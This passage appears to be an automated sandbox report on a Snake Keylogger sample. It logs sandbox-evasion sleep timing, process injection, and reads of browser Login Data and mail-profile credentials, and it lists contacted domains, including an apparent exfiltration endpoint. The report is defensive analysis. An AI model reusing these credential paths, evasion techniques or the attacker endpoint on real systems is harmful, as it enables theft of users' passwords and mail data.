        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595250Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595140Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595031Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594919Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594812Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594703Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594594Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594484Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeWindow / User API: threadDelayed 2216Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeWindow / User API: threadDelayed 7627Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 6684Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep count: 32 > 30Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -29514790517935264s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599873s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 3588Thread sleep count: 2216 > 30Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 3588Thread sleep count: 7627 > 30Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599766s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599655s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599531s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599421s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599284s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599156s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599046s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598937s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598817s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598687s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598578s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598469s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598359s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598250s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598140s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598031s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597922s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597797s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597672s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597562s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597453s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597339s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597234s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597125s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597016s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -596891s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -596781s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -596672s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -596562s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -596453s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -596344s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -596234s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -596125s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -596016s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -595906s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -595797s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -595687s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -595572s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -595469s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -595359s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -595250s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -595140s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -595031s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -594919s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -594812s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -594703s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -594594s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -594484s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599873Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599655Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599531Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599421Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599284Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599156Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599046Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598937Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598817Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598687Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598578Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598469Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598359Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598250Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598140Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598031Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597922Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597797Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597672Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597562Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597453Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597339Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597234Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597125Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597016Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596891Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596781Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596672Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596562Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596453Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596344Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596234Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596125Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596016Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595906Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595797Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595687Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595572Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595469Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595359Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595250Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595140Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595031Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594919Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594812Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594703Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594594Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594484Jump to behavior
        Source: PT98765445670009.scr.exe, 00000002.00000002.3683807412.000000000113B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C7988 LdrInitializeThunk,2_2_052C7988
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        .NET source code references suspicious native API functions
        Source: 1.2.PT98765445670009.scr.exe.55c0000.7.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
        Source: 1.2.PT98765445670009.scr.exe.55c0000.7.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
        Source: 1.2.PT98765445670009.scr.exe.55c0000.7.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory written: C:\Users\user\Desktop\PT98765445670009.scr.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess created: C:\Users\user\Desktop\PT98765445670009.scr.exe "C:\Users\user\Desktop\PT98765445670009.scr.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Users\user\Desktop\PT98765445670009.scr.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Users\user\Desktop\PT98765445670009.scr.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected Snake Keylogger
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTR
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Snake Keylogger
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		111
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		1
        Query Registry        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Disable or Modify Tools        		LSASS Memory1
        Security Software Discovery        		Remote Desktop Protocol11
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
        Virtualization/Sandbox Evasion        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
        Process Injection        		NTDS31
        Virtualization/Sandbox Evasion        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets1
        Application Window Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
        Obfuscated Files or Information        		Cached Domain Credentials1
        System Network Configuration Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Software Packing        		DCSync13
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Timestomp        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        DLL Side-Loading        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PT98765445670009.scr.exe50%ReversingLabsByteCode-MSIL.Trojan.RemcosRAT
        PT98765445670009.scr.exe60%VirustotalBrowse
        PT98765445670009.scr.exe100%AviraHEUR/AGEN.1309740
        PT98765445670009.scr.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        reallyfreegeoip.org1%VirustotalBrowse
        scratchdreams.tk6%VirustotalBrowse
        checkip.dyndns.com0%VirustotalBrowse
        checkip.dyndns.org0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://checkip.dyndns.org/0%URL Reputationsafe
        http://checkip.dyndns.org/q0%URL Reputationsafe
        http://reallyfreegeoip.org0%URL Reputationsafe
        https://reallyfreegeoip.org0%URL Reputationsafe
        http://checkip.dyndns.org0%URL Reputationsafe
        http://checkip.dyndns.com0%URL Reputationsafe
        https://reallyfreegeoip.org/xml/0%URL Reputationsafe
        https://scratchdreams.tk0%Avira URL Cloudsafe
        https://reallyfreegeoip.org/xml/102.165.48.430%Avira URL Cloudsafe
        http://crl.micro2G0%Avira URL Cloudsafe
        https://reallyfreegeoip.org/xml/102.165.48.43$0%Avira URL Cloudsafe
        https://scratchdreams.tk/_send_.php?TS0%Avira URL Cloudsafe
        http://scratchdreams.tk0%Avira URL Cloudsafe
        https://scratchdreams.tk/_send_.php?TS1%VirustotalBrowse
        http://scratchdreams.tk6%VirustotalBrowse
        https://scratchdreams.tk14%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        reallyfreegeoip.org
        		172.67.177.134
        		truefalseunknown
        scratchdreams.tk
        		104.21.27.85
        		truefalseunknown
        checkip.dyndns.com
        		193.122.6.168
        		truefalseunknown
        checkip.dyndns.org
        		unknown
        		unknowntrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://checkip.dyndns.org/false
        • URL Reputation: safe
        		unknown
        https://reallyfreegeoip.org/xml/102.165.48.43false
        • Avira URL Cloud: safe
        		unknown
        https://scratchdreams.tk/_send_.php?TSfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://reallyfreegeoip.org/xml/102.165.48.43$PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.micro2GPT98765445670009.scr.exe, 00000002.00000002.3683807412.000000000113B000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://checkip.dyndns.org/qPT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://scratchdreams.tkPT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002FAE000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
        • 14%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
